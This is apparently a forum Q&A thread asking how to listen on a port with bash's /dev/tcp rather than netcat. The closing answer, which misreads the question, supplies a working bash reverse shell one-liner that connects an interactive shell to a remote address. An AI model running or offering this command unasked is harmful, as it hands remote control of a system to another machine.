# Port listen using /dev/tcp

Tags: bash, tcp, netcat

What is the command line to port listen using `/dev/tcp` in Linux?  I know about the `netcat` command, but I'm interested in connecting directly to `/dev/tcp`.  I have tried `exec 3<> /dev/tcp/host/port`, but I'm not sure of the command.  Thanks.

Comment: http://unix.stackexchange.com/questions/49936/dev-tcp-listen-instead-of-nc-listen/49947#49947 contains the answer to your question.

Comment: I'm voting to close this question as off-topic because it's answered by a Unix.SE post linked from the comments.

Comment: I'm voting to close this question as off-topic because it's been answered by an offsite link

Answer (score 0):

This should work : bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
It's a bash reverse shell, I suppose that's what you want.